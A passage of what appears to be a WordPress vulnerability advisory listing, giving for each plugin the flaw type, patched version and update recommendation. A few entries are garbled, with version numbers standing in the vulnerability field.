Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.23.2
Recommended Action: Update to version 1.23.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.9.6
Recommended Action: Update to version 2.9.6, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Cross-Site Scripting via xmlpath
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Authenticated (Shop manager+) SQL Injection
Patched Version: 5.7.2
Recommended Action: Update to version 5.7.2, or a newer patched version

Plugin: Video.js – HTML5 Video Player for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Jobs

Vulnerability: SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: multi Scheduler

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.7.10
Recommended Action: Update to version 7.7.10, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Arbitrary File Upload
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: BBS e-Franchise

Vulnerability: SQL Injection
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Open Graph and Twitter Card Tags

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.2.4.2
Recommended Action: Update to version 2.2.4.2, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Missing Authorization
Patched Version: 12.1.21
Recommended Action: Update to version 12.1.21, or a newer patched version

Plugin: Content Egg

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: Contact List – Online Staff Directory and Address Book

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.42
Recommended Action: Update to version 2.9.42, or a newer patched version

Plugin: 2kb Amazon Affiliates Store

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Elementor Addons, Widgets and Enhancements – Stax

Vulnerability: Missing Authorization in toggle_widget
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: DPD Baltic Shipping

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Easy Social Like Box – Popup – Sidebar Widget

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Seriously Simple Stats

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: File Manager Pro – Filester

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Click to Call or Chat Buttons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.56
Recommended Action: Update to version 2.56, or a newer patched version

Plugin: Social Share Boost

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ssboost shortcode
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: ManageWP Worker

Vulnerability: Authentication Bypass
Patched Version: 4.9.3
Recommended Action: Update to version 4.9.3, or a newer patched version

Plugin: DevBuddy Twitter Feed

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Authenticated (Contributor+) Clickjacking via Iframe Injection
Patched Version: 12.7
Recommended Action: Update to version 12.7, or a newer patched version

Plugin: Vrm 360 3D Model Viewer

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CSV Import

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RokNewsPager

Vulnerability: Cross-Site Scripting
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: 2Way VideoCalls and Random Chat – HTML5 Webcam Videochat

Vulnerability: Cross-Site Scripting
Patched Version: 4.41.2
Recommended Action: Update to version 4.41.2, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: 10.41
Recommended Action: Update to version 10.41, or a newer patched version

Plugin: BetterLinks – An Advanced Solution for Affiliate Link Management, Link Shortening, Link Tracking, Link Branding & Marketing

Vulnerability: Improper Authorization to Data Import and Export
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Owl Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Order Export For WooCommerce

Vulnerability: CSV Injection
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Mortgage Calculators WP

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.53
Recommended Action: Update to version 1.53, or a newer patched version

Plugin: Global Flash Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 0.13.4
Recommended Action: Update to version 0.13.4, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: SQL Injection
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: GoCodes

Vulnerability: Authenticated Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Learn Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: HTML Forms – Simple WordPress Forms Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.3.25
Recommended Action: Update to version 1.3.25, or a newer patched version

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Authenticated SQL Injection (Google Analytics and Google Shopping plugin for WooCommerce <= 4.6.1)
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Image Hover Effects For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: MF Gig Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via event_title and event_time
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WooFramework Branding

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Auto Login New User After Registration

Vulnerability: Cross-Site Request Forgery to Settings Modification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cookie Information | Free GDPR Consent Solution

Vulnerability: Arbitrary Options Update and Action Calling
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: WP Simple Booking Calendar

Vulnerability: Authenticated SQL Injection
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Newsletter by Supsystic

Vulnerability: Authenticated (Admin+) Time-Based Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: PrePost SEO

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: PWA for WP & AMP

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: SQL Injection
Patched Version: 1.13.36
Recommended Action: Update to version 1.13.36, or a newer patched version

Plugin: Cron Setup and Monitor – Get URL Cron

Vulnerability: Cross-Site Request Forgery via geturlcron_action_handle
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: JetWidgets For Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Memberlite Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Shipyaari Shipping Management

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Cron Manager – debug & control

Vulnerability: Subscriber+ Arbitrary Events/Schedules Creation/Deletion
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Pickup | Delivery | Dine-in date time

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Authenticated (Admin+) Local File Inclusion via import_file_url
Patched Version: 5.4.3
Recommended Action: Update to version 5.4.3, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.1.121
Recommended Action: Update to version 1.1.121, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Weak validation of Amazon SNS push messages
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Void Contact Form 7 Widget For Elementor Page Builder

Vulnerability: Missing Authorization
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: WordPress Simple Shop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Salon Booking System

Vulnerability: Cross-Site Request Forgery to Admin Role Change to Customer, User Meta Update via save_customer
Patched Version: 8.4.8
Recommended Action: Update to version 8.4.8, or a newer patched version

Plugin: Developer Formatter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2013.0.1.41
Recommended Action: Update to version 2013.0.1.41, or a newer patched version

Plugin: Special Text Boxes

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9.110
Recommended Action: Update to version 5.9.110, or a newer patched version

Plugin: flash-player-widget

Vulnerability: Content Spoofing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Master Slider – Responsive Touch Slider

Vulnerability: Responsive Touch Slider <= 2.5.1
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Icegram Collect – Easy Form, Lead Collection and Subscription plugin

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Missing Authorization
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Mailchimp API Key
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: Seed Social

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: SQL Injection
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: Big File Uploads – Increase Maximum File Upload Size

Vulnerability: Cross-Site Request Forgery via actions
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Video Gallery – YouTube Playlist, Channel Gallery by YotuWP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: NEX-Forms Lite – WordPress Contact Form builder

Vulnerability: Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: WP EXtra

Vulnerability: Missing Authorization to Arbitrary Email Sending
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Donate Extra

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to one of the following versions, or a newer patched version: 1.6.5, 1.7.1

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WebToffee WP Backup and Migration

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: BulkGate SMS Plugin for WooCommerce

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Side Menu Lite – add sticky fixed buttons

Vulnerability: add sticky fixed buttons < 2.2.6
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Firewall & Malware Scan <= 3.3.6
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Authenticated SQL Injection
Patched Version: 1.13.3
Recommended Action: Update to version 1.13.3, or a newer patched version

Core: WordPress

Vulnerability: Improper Authorization Checks
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: All In One Login — WordPress Login Security Plugin to Protect and Customize WP Admin

Vulnerability: Protection Mechanism Failure to Login Page Disclosure
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: 3.9.4
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: WooCommerce PayU India (PayUmoney – PayUbiz)

Vulnerability: Improper Input Validation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Latest Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.5
Recommended Action: Update to version 3.7.5, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Missing Authorization to Settings Import
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Nokia Maps & Places

Vulnerability: Open Redirect
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Swift SMTP (formerly Welcome Email Editor)

Vulnerability: Missing Authorization via ajax_handler
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Premium Addons Pro for Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.25
Recommended Action: Update to version 2.8.25, or a newer patched version

Plugin: WordPress Survey & Poll – Quiz, Survey and Poll Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WordPress Security – Firewall, Malware Scanner, Secure Login and Backup

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: BCorp Shortcodes

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TriPay Payment Gateway

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: BIC Media Widget

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Homepage SlideShow

Vulnerability: Arbitrary File Upload
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Google Fonts For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Store Exporter <= 2.7.2
Patched Version: 2.7.2.1
Recommended Action: Update to version 2.7.2.1, or a newer patched version

Plugin: Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan

Vulnerability: Missing Authorization to Arbitrary Plugin Install
Patched Version: 4.20
Recommended Action: Update to version 4.20, or a newer patched version

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Missing Authorization to Authenticated Settings Change
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Authorization Bypass to Settings Updates
Patched Version: 1.0.126
Recommended Action: Update to version 1.0.126, or a newer patched version

Plugin: WordPress plugin AnyVar

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MyBookTable Bookstore by Stormhill Media

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution

Vulnerability: Cross-Site Request Forgery via get_product
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Modern Footnotes

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.16
Recommended Action: Update to version 1.4.16, or a newer patched version

Plugin: No Future Posts

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CDI – Collect and Deliver Interface for Woocommerce

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5.1.10
Recommended Action: Update to version 5.1.10, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: WordPress ERP, HR, CRM, and Project Management Plugin – Business Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.9.5
Recommended Action: Update to version 5.9.5, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.9
Recommended Action: Update to version 1.10.9, or a newer patched version

Plugin: Cost Calculator Builder

Vulnerability: Improper Authorization
Patched Version: 3.1.43
Recommended Action: Update to version 3.1.43, or a newer patched version

Plugin: Limit Login Attempts Plus – WordPress Limit Login Attempts By Felix

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: wp-simple-login-registration-plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Cache Images

Vulnerability: Missing Authorization
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: WP-Filebase

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.24
Recommended Action: Update to version 3.4.24, or a newer patched version

Plugin: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Vulnerability: Cross-Site Request Forgery via shortpixel_ai_handle_page_action
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Weekly Schedule

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: GEO my WP

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: OneClick Chat to Order

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: MainWP UpdraftPlus Extension

Vulnerability: Missing Authorization
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Post Pay Counter

Vulnerability: Arbitrary Settings Change
Patched Version: 2.731
Recommended Action: Update to version 2.731, or a newer patched version

Plugin: External Links in New Window / New Tab

Vulnerability: Tabnabbing
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: Gallery Metabox

Vulnerability: Missing Authorization via refresh_metabox
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leyka

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.30.3
Recommended Action: Update to version 3.30.3, or a newer patched version

Plugin: Order auto complete for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Alpine Photo Tile for Instagram

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.7.6
Recommended Action: Update to version 1.2.7.6, or a newer patched version

Plugin: NewStatPress

Vulnerability: Authenticated SQL Injection
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Denial of Service via Large Form Submissions
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: Event Registration

Vulnerability: SQL Injection
Patched Version: 6.03.01
Recommended Action: Update to version 6.03.01, or a newer patched version

Plugin: Advanced AJAX Page Loader

Vulnerability: Arbitrary File Upload
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: Frontpage Manager

Vulnerability: Cross-Site Request Forgery via admin_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Prototype Pollution via Block Editor
Patched Version: 3.7.38
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.38, 3.8.38, 3.9.36, 4.0.35, 4.1.35, 4.2.32, 4.3.28, 4.4.27, 4.5.26, 4.6.23, 4.7.23, 4.8.19, 4.9.20, 5.0.16, 5.1.13, 5.2.15, 5.3.12, 5.4.10, 5.5.9, 5.6.8, 5.7.6, 5.8.4, 5.9.2

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Shortcut Macros

Vulnerability: Missing Authorization to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection via IP
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Justified Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Portfolio and Projects

Vulnerability: Cross-Site Request Forgery via ‘wpos_anylc_admin_init_process’
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Daily Prayer Time

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2023.05.05
Recommended Action: Update to version 2023.05.05, or a newer patched version

Plugin: HT Feed

Vulnerability: Cross-Site Request Forgery leading to Limited Plugin Activation
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: RabbitLoader – Website Speed Optimization for improving Core Web Vital metrics with Cache, Image Optimization, and more

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 2.19.14
Recommended Action: Update to version 2.19.14, or a newer patched version

Plugin: WP Content Copy Protection & No Right Click

